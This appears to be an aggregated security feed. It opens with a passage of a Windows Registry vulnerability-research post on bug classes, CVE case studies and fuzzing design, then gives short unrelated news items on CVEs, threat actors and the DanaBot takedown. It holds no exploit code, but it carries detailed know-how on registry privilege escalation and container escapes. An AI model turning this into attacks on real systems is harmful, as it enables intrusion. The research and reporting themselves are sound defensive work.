hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.Low-level information disclosure (memory, pointers) Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation. However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files. The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.Broken security guarantees, API contracts and common sense assumptions Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them. In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.Security access rights enforcement The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for: CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure. As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.Confused deputy problems with predefined keys Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.Atomicity of KTM transactions The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work. I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.Containerized registry escapes The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption. When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system. As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post. After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. [...] Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege. Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.Adherence to official key and value name length limits The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits: Registry element Size limit Key name 255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE. Value name 16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters. Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period. As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code. Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times. I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.Creation of stable keys under volatile ones Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempts to do so results in the  ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior. During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.Arbitrary key existence information leak If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND). After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease.  It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.Miscellaneous In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.Unusual primitives: These are various non standard primitives that are simply too difficult to categorize, such as CVE-2024-26177, CVE-2024-26178, WinRegLowSeverityBugs #19, or WinRegLowSeverityBugs #20.Fuzzing considerations Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash. It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:Fixing the hash in the regf header,Performing a few simple operations on the hive, like enumerating subkeys and values,Running on multiple machines at once,Collecting code coverage information from the Windows kernel. Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.Initial corpus The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.The data structures within them are practically never even close to the limits imposed by the format itself, for example:The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code. This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.Mutator Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible. For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,Slightly change the name of a key or value, or the data in the backing cell of a value,Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,Change the value of some cell index, usually to an incorrect value,Change/corrupt the binary representation of a security descriptor in some way. This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, ​​and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero. In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins. This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations. As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operation on it. One can only dream... 🙂 Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.Harness While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.Support a  "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.Support the registry virtualization mechanism, which can consist of several components:Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,Creating an additional key structure under the HKU\_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce. The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.Bug detection Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions. The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it. Here are a few ideas for addressing the problem, some more realistic than others:If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data. Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.Conclusion This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!

CERT Polska has received a report about 3 vulnerabilities (from CVE-2025-3893 to CVE-2025-3895) found in MegaBIP software.

Cyble vulnerability intelligence researchers investigated nearly 100 IT and industrial control system (ICS) vulnerabilities this week and flagged eight as meriting high-priority attention by security teams – including two targeted by Russian threat actors. In all, Cyble investigated 21 IT vulnerabilities this week, 68 ICS vulnerabilities, and eight vulnerabilities under discussion by threat actors on dark web forums. The U.S. Cybersecurity and Infrastructure Security Agency added eight vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog last week, including the Ivanti Endpoint Manager Mobile (EPMM) and SAP NetWeaver vulnerabilities addressed in last week’s Cyble vulnerability blog. IT Vulnerabilities Here are four IT vulnerabilities highlighted by Cyble this week – and an additional six under discussion by threat actors on dark web forums. The Mozilla Foundation patched two Firefox vulnerabilities discovered by researchers during the Pwn2Own Berlin 2025 contest. Firefox 138.0.4 fixes the critical vulnerabilities. CVE-2025-4918 is an out-of-bounds memory access vulnerability in Firefox. The flaw occurs when resolving JavaScript Promise objects, allowing an attacker to perform unauthorized out-of-bounds read or write in memory. CVE-2025-4919 is another critical out-of-bounds access vulnerability in Mozilla Firefox. This flaw arises during optimizing linear sums in JavaScript, specifically due to array index miscalculations. An attacker could potentially exploit this bug to perform out-of-bound reading or writing, leading to memory corruption, potential code execution, or unauthorized access to sensitive data. CVE-2023-43770 and CVE-2020-35730 are cross-site scripting (XSS) vulnerabilities in Roundcube Webmail, an open-source, browser-based email client. The flaws could allow attackers to inject malicious JavaScript via specially crafted links in plain text email messages, exploiting improper input neutralization in the rcube_string_replacer.php component. Researchers recently revealed that the vulnerabilities have been actively exploited in the wild, notably by the Russian state-sponsored threat group APT28 (also known as Fancy Bear) in spearphishing and espionage campaigns targeting public sector organizations and critical infrastructure in Europe, Cameroon, and Ecuador. Among vulnerabilities under discussion on dark web forums, flaws in SysAid On-Premises (CVE-2025-2775 and CVE-2025-2776) and GNU Screen (CVE-2025-46802, CVE-2025-46803, CVE-2025-46804, and CVE-2025-46805) figured prominently in threat actor discussions of potential exploits. Also this week, Cyble honeypot sensors detected attack attempts on CVE-2025-3248, a 9.8-severity Missing Authentication for Critical Function vulnerability in versions of the Langflow low-code AI builder before 1.3.0. ICS Vulnerabilities Of the 68 ICS vulnerabilities evaluated by Cyble researchers this week, four stood out as meriting high-priority attention by security teams. CVE-2025-4364 is an Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability affecting Assured Telematics Inc.'s Fleet Management System. If successfully exploited, this vulnerability could allow an attacker to collect sensitive file system details or gain access to administrative credentials, posing a serious threat to operational security. CVE-2025-46412 (Authentication Bypass) and CVE-2025-41426 (Stack-based Buffer Overflow) are vulnerabilities affecting Vertiv's Liebert RDU101 and IS-UNITY modules, which are widely used for remote monitoring and integration of critical infrastructure like UPS and cooling systems in data centers, energy, and communication sectors. These modules enable communication with SCADA, DCS, and BMS systems, making them high-value targets. Successful exploitation could allow unauthorized access or remote code execution, posing serious operational and security risks. Immediate mitigation is essential to protect critical infrastructure. CVE-2025-41450 is an Improper Authentication vulnerability in Danfoss AK-SM 8xxA Series (versions prior to R4.2), which are widely used in commercial facility control systems such as SCADA, DCS, and BMS. The flaw could allow unauthorized users to bypass login mechanisms and gain access to sensitive system functions. Given the role of these systems in managing key infrastructure like refrigeration and building automation, the vulnerability poses a significant operational risk. Conclusion The high number of vulnerabilities this week underscores the constant threats facing IT and ICS environments. Studies have shown that organizations only patch around 15% of vulnerabilities on average, making a risk-based vulnerability management program critically crucial for all organizations. Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets, removing or protecting web-facing assets, Zero-Trust access principles, ransomware-resistant backups, hardened endpoints, infrastructure, and configurations, network, endpoint, and cloud monitoring, and well-rehearsed incident response plans. Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization today. The post The Week in Vulnerabilities: Firefox, Roundcube and ICS Flaws Flagged by Cyble appeared first on Cyble.

En allvarlig sårbarhet har upptäckts i BIND (CVE-2025-40775), med CVSS-klassificering 7.5. [1] Genom att skicka DNS-data med en speciellt utformad TSIG (Transaction Signature) kan servern göras otillgänglig. [2] Detta kan vidare påverka tjänster så som e-post, autentisering, fjärråtkomst och annat som är beroende av DNS.

A Chinese state-linked threat group, identified as UAT-6382, has exploited a previously patched vulnerability in Trimble Cityworks software to compromise local government networks in the United States, according to a report by Cisco Talos. The flaw, tracked as CVE-2025-0994 and carrying a CVSS v4 score of 8.6, is a deserialization vulnerability that can be exploited for remote code execution. Despite being patched, the vulnerability was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities catalog in February 2025. Since January, UAT-6382 has been leveraging this flaw to breach municipal systems, deploying Chinese-language web shells and custom […] The post Chinese Hackers exploit Trimble Cityworks flaw to infiltrate U.S. Local Government Systems first appeared on Cybersafe News.

Celebrate #MaintainerMonth with two big opportunities to showcase your open source project at GitHub Universe and WeAreDevelopers World Congress. Applications are open. Don’t miss out! The post Shine a spotlight on your open source project appeared first on The GitHub Blog.

The U.S. Department of Justice (DoJ) announced the takedown of the DanaBot malware infrastructure and unsealed indictments against 16 individuals accused of fueling a global malware-as-a-service (MaaS) operation that caused over $50 million in damages. The sophisticated cyber scheme, allegedly operated by a Russia-based group, infected more than 300,000 devices worldwide. Aleksandr Stepanov, 39, and Artem Kalinkin, 34, both from Novosibirsk, Russia, were charged who remain at large. Stepanov faces multiple counts, including conspiracy, wire fraud, aggravated identity theft, and unauthorized computer access. Kalinkin is charged with conspiracy to commit computer fraud and unauthorized system impairment. Court documents reveal that […] The post U.S. Dismantles DanaBot Malware Network in major Global cybercrime bust first appeared on Cybersafe News.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Hossein Lotfi (@hosselot) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Corentin "@OnlyTheDuck" BAYET from REverse Tactics' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

